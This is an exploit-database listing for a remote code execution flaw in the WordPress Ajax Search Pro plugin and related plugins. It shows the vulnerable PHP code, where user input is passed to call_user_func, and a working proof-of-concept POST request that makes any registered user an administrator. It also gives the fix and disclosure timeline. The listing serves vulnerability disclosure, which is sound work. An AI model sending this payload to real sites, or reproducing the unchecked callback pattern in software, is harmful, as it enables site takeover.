Lucene search
K

WordPress Ajax Search Pro Remote Code Execution Vulnerability

🗓️ 10 Apr 2015 00:00:00Reported by EvexType 
zdt
 zdt
🔗 0day.today👁 35 Views

WordPress Ajax Search Pro Remote Code Execution Vulnerability due to Arbitrary Function Executio

Code
------------------------------------------------------------------------------
WordPress ajax-search-pro Plugin Remote Code Execution
------------------------------------------------------------------------------

[-] Plugin Link:

http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410

also affected:
    https://wordpress.org/plugins/ajax-search-lite/
    https://wordpress.org/plugins/related-posts-lite/

[-] Vulnerability Description:

This vulnerability allows any registered user to execute arbitrary functions
vulnerability code:

add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
    function wpdreams_ajaxinputcallback() {
        $param = $_POST;
        echo call_user_func($_POST['wpdreams_callback'], $param);
        exit;
    }
}

this will allow any registered user to execute any function he wants with
1st param set to array($_POST)
since wordpress core provides some functions that accept 1st param as an
array then,
wp_insert_user have a role option for the user you are inserting, this
option can insert a new administrator

[-] Proof of Concept:

this will register an administrator with username "xADMIN" and password
"xPASS"

url:
http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput
post data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

[-] Fix:

Updated to the latest version.

[-] Timeline:

09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure

[-] Refernces:
http://research.evex.pw/?vuln=9

@Evex_1337

#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation